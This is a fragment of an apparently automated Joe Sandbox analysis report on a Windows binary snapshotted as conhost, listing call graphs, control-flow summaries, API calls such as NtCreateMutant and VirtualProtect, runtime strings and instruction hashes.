140001394 2 API calls 2658->2659 2660 1400015d5 2659->2660 2661 140001394 2 API calls 2660->2661 2662 1400015e4 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400015f3 2663->2664 2664->2240 2666 140001394 2 API calls 2665->2666 2667 140001530 2666->2667 2668 140001394 2 API calls 2667->2668 2669 14000153f 2668->2669 2670 140001394 2 API calls 2669->2670 2671 14000154e 2670->2671 2672 140001394 2 API calls 2671->2672 2673 14000155d 2672->2673 2674 140001394 2 API calls 2673->2674 2675 14000156c 2674->2675 2676 140001394 2 API calls 2675->2676 2677 14000157b 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000158a 2678->2679 2680 140001394 2 API calls 2679->2680 2681 140001599 2680->2681 2682 140001394 2 API calls 2681->2682 2683 1400015a8 2682->2683 2684 140001394 2 API calls 2683->2684 2685 1400015b7 2684->2685 2686 140001394 2 API calls 2685->2686 2687 1400015c6 2686->2687 2688 140001394 2 API calls 2687->2688 2689 1400015d5 2688->2689 2690 140001394 2 API calls 2689->2690 2691 1400015e4 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015f3 2692->2693 2693->2240 2695 140001394 2 API calls 2694->2695 2696 140001431 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001440 2697->2698 2699 140001394 2 API calls 2698->2699 2700 14000144f 2699->2700 2701 140001394 2 API calls 2700->2701 2702 14000145e 2701->2702 2703 140001394 2 API calls 2702->2703 2704 14000146d 2703->2704 2705 140001394 2 API calls 2704->2705 2706 14000147c 2705->2706 2707 140001394 2 API calls 2706->2707 2708 14000148b 2707->2708 2709 140001394 2 API calls 2708->2709 2710 14000149a 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400014a9 2711->2712 2713 140001394 2 API calls 2712->2713 2714 1400014b8 2713->2714 2715 140001394 2 API calls 2714->2715 2716 1400014c7 2715->2716 2717 140001394 2 API calls 2716->2717 2718 1400014d6 2717->2718 2719 1400014e5 2718->2719 2720 140001394 2 API calls 2718->2720 2721 140001394 2 API calls 2719->2721 2720->2719 2722 1400014ef 2721->2722 2723 1400014f4 2722->2723 2724 140001394 2 API calls 2722->2724 2725 140001394 2 API calls 2723->2725 2724->2723 2726 1400014fe 2725->2726 2727 140001503 2726->2727 2728 140001394 2 API calls 2726->2728 2729 140001394 2 API calls 2727->2729 2728->2727 2730 14000150d 2729->2730 2731 140001394 2 API calls 2730->2731 2732 140001512 2731->2732 2733 140001394 2 API calls 2732->2733 2734 140001521 2733->2734 2735 140001394 2 API calls 2734->2735 2736 140001530 2735->2736 2737 140001394 2 API calls 2736->2737 2738 14000153f 2737->2738 2739 140001394 2 API calls 2738->2739 2740 14000154e 2739->2740 2741 140001394 2 API calls 2740->2741 2742 14000155d 2741->2742 2743 140001394 2 API calls 2742->2743 2744 14000156c 2743->2744 2745 140001394 2 API calls 2744->2745 2746 14000157b 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000158a 2747->2748 2749 140001394 2 API calls 2748->2749 2750 140001599 2749->2750 2751 140001394 2 API calls 2750->2751 2752 1400015a8 2751->2752 2753 140001394 2 API calls 2752->2753 2754 1400015b7 2753->2754 2755 140001394 2 API calls 2754->2755 2756 1400015c6 2755->2756 2757 140001394 2 API calls 2756->2757 2758 1400015d5 2757->2758 2759 140001394 2 API calls 2758->2759 2760 1400015e4 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015f3 2761->2762 2762->2240 2764 140001394 2 API calls 2763->2764 2765 140001440 2764->2765 2766 140001394 2 API calls 2765->2766 2767 14000144f 2766->2767 2768 140001394 2 API calls 2767->2768 2769 14000145e 2768->2769 2770 140001394 2 API calls 2769->2770 2771 14000146d 2770->2771 2772 140001394 2 API calls 2771->2772 2773 14000147c 2772->2773 2774 140001394 2 API calls 2773->2774 2775 14000148b 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000149a 2776->2777 2778 140001394 2 API calls 2777->2778 2779 1400014a9 2778->2779 2780 140001394 2 API calls 2779->2780 2781 1400014b8 2780->2781 2782 140001394 2 API calls 2781->2782 2783 1400014c7 2782->2783 2784 140001394 2 API calls 2783->2784 2785 1400014d6 2784->2785 2786 1400014e5 2785->2786 2787 140001394 2 API calls 2785->2787 2788 140001394 2 API calls 2786->2788 2787->2786 2789 1400014ef 2788->2789 2790 1400014f4 2789->2790 2791 140001394 2 API calls 2789->2791 2792 140001394 2 API calls 2790->2792 2791->2790 2793 1400014fe 2792->2793 2794 140001503 2793->2794 2795 140001394 2 API calls 2793->2795 2796 140001394 2 API calls 2794->2796 2795->2794 2797 14000150d 2796->2797 2798 140001394 2 API calls 2797->2798 2799 140001512 2798->2799 2800 140001394 2 API calls 2799->2800 2801 140001521 2800->2801 2802 140001394 2 API calls 2801->2802 2803 140001530 2802->2803 2804 140001394 2 API calls 2803->2804 2805 14000153f 2804->2805 2806 140001394 2 API calls 2805->2806 2807 14000154e 2806->2807 2808 140001394 2 API calls 2807->2808 2809 14000155d 2808->2809 2810 140001394 2 API calls 2809->2810 2811 14000156c 2810->2811 2812 140001394 2 API calls 2811->2812 2813 14000157b 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000158a 2814->2815 2816 140001394 2 API calls 2815->2816 2817 140001599 2816->2817 2818 140001394 2 API calls 2817->2818 2819 1400015a8 2818->2819 2820 140001394 2 API calls 2819->2820 2821 1400015b7 2820->2821 2822 140001394 2 API calls 2821->2822 2823 1400015c6 2822->2823 2824 140001394 2 API calls 2823->2824 2825 1400015d5 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015e4 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015f3 2828->2829 2829->2240

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_0000000140001AE4 29 Function_0000000140001D40 0->29 71 Function_0000000140001BA0 0->71 1 Function_00000001400014E5 67 Function_0000000140001394 1->67 2 Function_00000001400010F0 3 Function_00000001400054F1 4 Function_00000001400014F4 4->67 5 Function_0000000140001800 61 Function_0000000140002290 5->61 6 Function_0000000140001000 7 Function_0000000140001E00 6->7 35 Function_0000000140001750 6->35 75 Function_0000000140001FB0 6->75 83 Function_0000000140001FC0 6->83 8 Function_0000000140002F00 52 Function_0000000140001370 8->52 9 Function_0000000140005A00 30 Function_0000000140005740 9->30 10 Function_0000000140002500 11 Function_0000000140005601 12 Function_0000000140001503 12->67 13 Function_0000000140001404 13->67 14 Function_0000000140002104 15 Function_0000000140001E10 16 Function_0000000140003111 17 Function_0000000140005511 18 Function_0000000140001512 18->67 19 Function_0000000140002420 20 Function_0000000140002320 21 Function_0000000140005720 22 Function_0000000140001521 22->67 23 Function_0000000140001422 23->67 24 Function_0000000140001530 24->67 25 Function_0000000140003130 26 Function_0000000140001431 26->67 27 Function_0000000140005631 28 Function_000000014000153F 28->67 29->61 31 Function_0000000140001440 31->67 32 Function_0000000140001140 43 Function_0000000140001160 32->43 33 Function_0000000140005541 34 Function_0000000140001F47 51 Function_0000000140001870 34->51 36 Function_0000000140002050 37 Function_0000000140005750 37->30 38 Function_0000000140001650 39 Function_0000000140003150 40 Function_000000014000155D 40->67 41 Function_000000014000145E 41->67 42 Function_0000000140002660 43->43 43->51 53 Function_0000000140003170 43->53 58 Function_0000000140001880 43->58 60 Function_0000000140001F90 43->60 82 Function_00000001400016C0 43->82 44 Function_0000000140001760 97 Function_00000001400020E0 44->97 45 Function_0000000140002460 46 Function_0000000140005561 47 Function_0000000140001E65 47->51 48 Function_000000014000156C 48->67 49 Function_000000014000146D 49->67 50 Function_000000014000216F 53->8 53->12 53->22 53->23 53->24 53->26 53->28 53->30 53->31 53->41 53->42 53->48 53->49 53->52 57 Function_000000014000157B 53->57 72 Function_00000001400015A8 53->72 73 Function_00000001400014A9 53->73 53->82 95 Function_00000001400014D6 53->95 96 Function_00000001400026E0 53->96 54 Function_0000000140001A70 54->29 54->71 55 Function_0000000140003071 56 Function_0000000140005671 57->67 58->19 58->29 58->42 58->71 59 Function_0000000140005581 62 Function_0000000140002590 63 Function_0000000140003090 64 Function_0000000140002691 65 Function_0000000140005491 66 Function_0000000140005691 67->9 67->37 68 Function_0000000140002194 68->51 69 Function_000000014000219E 70 Function_0000000140001FA0 71->29 74 Function_00000001400023B0 71->74 88 Function_00000001400024D0 71->88 72->67 73->67 76 Function_00000001400022B0 77 Function_00000001400026B0 78 Function_00000001400030B0 79 Function_00000001400054B1 80 Function_00000001400055B1 81 Function_0000000140001AB3 81->29 81->71 84 Function_00000001400056C1 85 Function_0000000140001AC3 85->29 85->71 86 Function_00000001400014C7 86->67 87 Function_0000000140001FD0 89 Function_00000001400017D0 90 Function_00000001400026D0 91 Function_00000001400030D1 92 Function_00000001400054D1 93 Function_00000001400055D1 94 Function_0000000140001AD4 94->29 94->71 95->67 96->1 96->4 96->12 96->18 96->30 96->40 96->41 96->42 96->52 96->73 96->86 98 Function_00000001400017E0 98->97 99 Function_00000001400022E0 100 Function_00000001400055E0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • NtCreateMutant.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000017.00000002.2978517702.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                        • Associated: 00000017.00000002.2978483142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978549126.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978574289.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978595339.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutant
                                                                        • String ID:
                                                                        • API String ID: 2492398971-0
                                                                        • Opcode ID: 3197e8f860b6eed2e4e294199e11338b0f26825a9764a5de6468cd1bf7e9c5ec
                                                                        • Instruction ID: 77c70193206588a20e0c73209e99fb06f5e1c41bf9337398acdbf510f541abd4
                                                                        • Opcode Fuzzy Hash: 3197e8f860b6eed2e4e294199e11338b0f26825a9764a5de6468cd1bf7e9c5ec
                                                                        • Instruction Fuzzy Hash: D6F09DB6608B8086EAA2DB52F89579A77A1F38D7C4F009919BBC843735DB38C1948F44

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 293 1400026e0-14000273b call 140002660 memset 296 140002741-14000274b 293->296 297 14000280e-14000285e call 14000155d 293->297 299 140002774-14000277a 296->299 304 140002953-14000297b call 1400014c7 297->304 305 140002864-140002873 297->305 299->297 300 140002780-140002787 299->300 302 140002789-140002792 300->302 303 140002750-140002752 300->303 306 140002794-1400027ab 302->306 307 1400027f8-1400027fb 302->307 311 14000275a-14000276e 303->311 321 140002986-1400029c8 call 140001503 call 140005740 memset 304->321 322 14000297d 304->322 309 140002eb7-140002ef4 call 140001370 305->309 310 140002879-140002888 305->310 313 1400027f5 306->313 314 1400027ad-1400027c2 306->314 307->311 316 1400028e4-14000294e wcsncmp call 1400014e5 310->316 317 14000288a-1400028dd 310->317 311->297 311->299 313->307 320 1400027d0-1400027d7 314->320 316->304 317->316 323 1400027d9-1400027f3 320->323 324 140002800-140002809 320->324 329 140002e49-140002e84 call 140001370 321->329 330 1400029ce-1400029d5 321->330 322->321 323->313 323->320 324->311 333 1400029d7-140002a0c 329->333 338 140002e8a 329->338 332 140002a13-140002a43 wcscpy wcscat wcslen 330->332 330->333 335 140002a45-140002a76 wcslen 332->335 336 140002a78-140002aa5 332->336 333->332 337 140002aa8-140002abf wcslen 335->337 336->337 339 140002ac5-140002ad8 337->339 340 140002e8f-140002eab call 140001370 337->340 338->332 341 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 339->341 342 140002ada-140002aee 339->342 340->309 361 140002dfd-140002e1b call 140001512 341->361 362 140002e20-140002e48 call 14000145e 341->362 342->341 361->362
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000017.00000002.2978517702.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                        • Associated: 00000017.00000002.2978483142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978549126.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978574289.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978595339.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                                        Similarity
                                                                        • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                        • String ID: 0$X$`
                                                                        • API String ID: 780471329-2527496196
                                                                        • Opcode ID: cd1fde40f7ec2322daa4a82a83d5092627c85bab1d4f689dd3836222091484e1
                                                                        • Instruction ID: fbe13dae5c278679277929bb0ef1f9151af982e63789306acfe715aa0dccc4dd
                                                                        • Opcode Fuzzy Hash: cd1fde40f7ec2322daa4a82a83d5092627c85bab1d4f689dd3836222091484e1
                                                                        • Instruction Fuzzy Hash: 231237B2608BC086E762DB16F8443EA77A4F789794F404215EBA957BF5EF78C189C700

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000017.00000002.2978517702.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                        • Associated: 00000017.00000002.2978483142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978549126.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978574289.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978595339.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                                        Similarity
                                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                        • String ID:
                                                                        • API String ID: 2643109117-0
                                                                        • Opcode ID: 05a3f638fd541900b434804bd1aea30d4610b6acacc7590026741399d937fad6
                                                                        • Instruction ID: 8af98831d99c1c62c39eafb9c91c1ea52004103d1f53acc9d6b10dcc006a894f
                                                                        • Opcode Fuzzy Hash: 05a3f638fd541900b434804bd1aea30d4610b6acacc7590026741399d937fad6
                                                                        • Instruction Fuzzy Hash: 945107B1615A4485FA66EF27F9543EA27A1B78D7C0F449025FF4D973B2DE38C4958300

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 407 140001ba0-140001bc0 408 140001bc2-140001bd7 407->408 409 140001c09 407->409 410 140001be9-140001bf1 408->410 411 140001c0c-140001c17 call 1400023b0 409->411 412 140001bf3-140001c02 410->412 413 140001be0-140001be7 410->413 418 140001cf4-140001cfe call 140001d40 411->418 419 140001c1d-140001c6c call 1400024d0 VirtualQuery 411->419 412->413 415 140001c04 412->415 413->410 413->411 417 140001cd7-140001cf3 memcpy 415->417 422 140001d03-140001d1e call 140001d40 418->422 419->422 425 140001c72-140001c79 419->425 426 140001d23-140001d38 GetLastError call 140001d40 422->426 427 140001c7b-140001c7e 425->427 428 140001c8e-140001c97 425->428 432 140001cd1 427->432 433 140001c80-140001c83 427->433 429 140001ca4-140001ccf VirtualProtect 428->429 430 140001c99-140001c9c 428->430 429->426 429->432 430->432 434 140001c9e 430->434 432->417 433->432 436 140001c85-140001c8a 433->436 434->429 436->432 437 140001c8c 436->437 437->434
                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140006B14,0000000140006B14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140006B14,0000000140006B14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                                                        • GetLastError.KERNEL32(?,?,?,?,0000000140006B14,0000000140006B14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000017.00000002.2978517702.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                        • Associated: 00000017.00000002.2978483142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978549126.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978574289.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978595339.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                        • API String ID: 2595394609-2123141913
                                                                        • Opcode ID: 369e9311ef696726b0a155cbfdf71ef7d465b9af589d05cd345b275a649062f7
                                                                        • Instruction ID: 317781c4e184af08c1e4a4cf19b378569b8254382c11a7e8d4883772d7b32f7c
                                                                        • Opcode Fuzzy Hash: 369e9311ef696726b0a155cbfdf71ef7d465b9af589d05cd345b275a649062f7
                                                                        • Instruction Fuzzy Hash: 654124B1200A4482FA66DF57F884BE927A1F79DBC4F554126AF0A877B1DA38C586C700

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 438 140002104-14000210b 439 140002111-140002128 EnterCriticalSection 438->439 440 140002218-140002221 438->440 441 14000220b-140002212 LeaveCriticalSection 439->441 442 14000212e-14000213c 439->442 443 140002272-140002280 440->443 444 140002223-14000222d 440->444 441->440 445 14000214d-140002159 TlsGetValue GetLastError 442->445 446 140002241-140002263 DeleteCriticalSection 444->446 447 14000222f 444->447 448 14000215b-14000215e 445->448 449 140002140-140002147 445->449 446->443 450 140002230-14000223f free 447->450 448->449 451 140002160-14000216d 448->451 449->441 449->445 450->446 450->450 451->449
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000017.00000002.2978517702.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                        • Associated: 00000017.00000002.2978483142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978549126.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978574289.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978595339.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                        • String ID:
                                                                        • API String ID: 3326252324-0
                                                                        • Opcode ID: c6f9ff65e3e11ce9f2db092b477506ff3865844c2aba902e6d5b192293f3fb5d
                                                                        • Instruction ID: b0f061dca8c0c25f491a7cfea55b9602963090f670f90f91e86d470a3b22d19b
                                                                        • Opcode Fuzzy Hash: c6f9ff65e3e11ce9f2db092b477506ff3865844c2aba902e6d5b192293f3fb5d
                                                                        • Instruction Fuzzy Hash: 342125B5205A5092FA2BEB53FD443E823A9BB2CBD0F444021FF4A576B0DB78C9868700

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 453 140001e10-140001e2d 454 140001e3e-140001e48 453->454 455 140001e2f-140001e38 453->455 457 140001ea3-140001ea8 454->457 458 140001e4a-140001e53 454->458 455->454 456 140001f60-140001f69 455->456 457->456 461 140001eae-140001eb3 457->461 459 140001e55-140001e60 458->459 460 140001ecc-140001ed1 458->460 459->457 464 140001f23-140001f2d 460->464 465 140001ed3-140001ee2 signal 460->465 462 140001eb5-140001eba 461->462 463 140001efb-140001f0a call 140005cf0 461->463 462->456 468 140001ec0 462->468 463->464 474 140001f0c-140001f10 463->474 466 140001f43-140001f45 464->466 467 140001f2f-140001f3f 464->467 465->464 469 140001ee4-140001ee8 465->469 466->456 467->466 468->464 472 140001eea-140001ef9 signal 469->472 473 140001f4e-140001f53 469->473 472->456 475 140001f5a 473->475 476 140001f12-140001f21 signal 474->476 477 140001f55 474->477 475->456 476->456 477->475
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000017.00000002.2978517702.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                        • Associated: 00000017.00000002.2978483142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978549126.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978574289.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978595339.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CCG
                                                                        • API String ID: 0-1584390748
                                                                        • Opcode ID: 393cc606882e9a050ec640329e2984cf93600f5b8f61303b70b774649d91817d
                                                                        • Instruction ID: c58ec9a1e6f408180b8eb38a33ff888f9736bd55299adffb4b6e5bd2cea0ca5c
                                                                        • Opcode Fuzzy Hash: 393cc606882e9a050ec640329e2984cf93600f5b8f61303b70b774649d91817d
                                                                        • Instruction Fuzzy Hash: BE2159B1A0160546FA77DA2BB5943FA1182ABCDBE4F258535BF1A473F5DE3888828241

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 478 140001880-14000189c 479 1400018a2-1400018f9 call 140002420 call 140002660 478->479 480 140001a0f-140001a1f 478->480 479->480 485 1400018ff-140001910 479->485 486 140001912-14000191c 485->486 487 14000193e-140001941 485->487 488 14000194d-140001954 486->488 489 14000191e-140001929 486->489 487->488 490 140001943-140001947 487->490 493 140001956-140001961 488->493 494 14000199e-1400019a6 488->494 489->488 491 14000192b-14000193a 489->491 490->488 492 140001a20-140001a26 490->492 491->487 496 140001b87-140001b98 call 140001d40 492->496 497 140001a2c-140001a37 492->497 498 140001970-14000199c call 140001ba0 493->498 494->480 495 1400019a8-1400019c1 494->495 499 1400019df-1400019e7 495->499 497->494 500 140001a3d-140001a5f 497->500 498->494 504 1400019e9-140001a0d VirtualProtect 499->504 505 1400019d0-1400019dd 499->505 506 140001a7d-140001a97 500->506 504->505 505->480 505->499 508 140001b74-140001b82 call 140001d40 506->508 509 140001a9d-140001afa 506->509 508->496 515 140001b22-140001b26 509->515 516 140001afc-140001b0e 509->516 519 140001b2c-140001b30 515->519 520 140001a70-140001a77 515->520 517 140001b5c-140001b6c 516->517 518 140001b10-140001b20 516->518 517->508 521 140001b6f call 140001d40 517->521 518->515 518->517 519->520 522 140001b36-140001b57 call 140001ba0 519->522 520->494 520->506 521->508 522->517
                                                                        APIs
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000017.00000002.2978517702.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                        • Associated: 00000017.00000002.2978483142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978549126.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978574289.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978595339.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                        • API String ID: 544645111-395989641
                                                                        • Opcode ID: 9f928920b704e742b8f1abd63b4269dd680cb02ee55e3bb4322fbf861a0de25b
                                                                        • Instruction ID: 280107d1bf147e52d706ca925ac02a81a849e1c7de280c0297ba80829cb45801
                                                                        • Opcode Fuzzy Hash: 9f928920b704e742b8f1abd63b4269dd680cb02ee55e3bb4322fbf861a0de25b
                                                                        • Instruction Fuzzy Hash: 1B5125B6710A44D6EB62CF67F8407D92762B759BE8F448221EB19177B4CB38C586C700

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 526 140001800-140001810 527 140001812-140001822 526->527 528 140001824 526->528 529 14000182b-140001867 call 140002290 fprintf 527->529 528->529
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000017.00000002.2978517702.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                        • Associated: 00000017.00000002.2978483142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978549126.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978574289.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978595339.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                                        Similarity
                                                                        • API ID: fprintf
                                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                        • API String ID: 383729395-3474627141
                                                                        • Opcode ID: 57269ad5e7c6942c4ed98709d4c934d0deb9f2e365bed53dc85f7da146699c8a
                                                                        • Instruction ID: 26ca4ab101e702e0f4d1efc3248034dfc3ddac7394ab04b5fa9a1477277e59e8
                                                                        • Opcode Fuzzy Hash: 57269ad5e7c6942c4ed98709d4c934d0deb9f2e365bed53dc85f7da146699c8a
                                                                        • Instruction Fuzzy Hash: 69F09671614A4482E612EB76B9413ED6361E75D7C1F54D211FF4D67662DF38D182C300

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 532 14000219e-1400021a5 533 140002272-140002280 532->533 534 1400021ab-1400021c2 EnterCriticalSection 532->534 535 140002265-14000226c LeaveCriticalSection 534->535 536 1400021c8-1400021d6 534->536 535->533 537 1400021e9-1400021f5 TlsGetValue GetLastError 536->537 538 1400021f7-1400021fa 537->538 539 1400021e0-1400021e7 537->539 538->539 540 1400021fc-140002209 538->540 539->535 539->537 540->539
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000017.00000002.2978517702.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                        • Associated: 00000017.00000002.2978483142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978549126.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978574289.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000017.00000002.2978595339.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_23_2_140000000_conhost.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                        • String ID:
                                                                        • API String ID: 682475483-0
                                                                        • Opcode ID: d2d50a5fd179c33091af8c36f78a5391110dc6c64888ee842984fba05b02cae5
                                                                        • Instruction ID: 2b40b27576255fa28d92e7e7a92570f7275575b188b33d604f3578c68fd32bcb
                                                                        • Opcode Fuzzy Hash: d2d50a5fd179c33091af8c36f78a5391110dc6c64888ee842984fba05b02cae5
                                                                        • Instruction Fuzzy Hash: CC01F6B6305A4082FA17DB63FD043D82365BB2CBD1F494021EF09537B4DBB8C9968300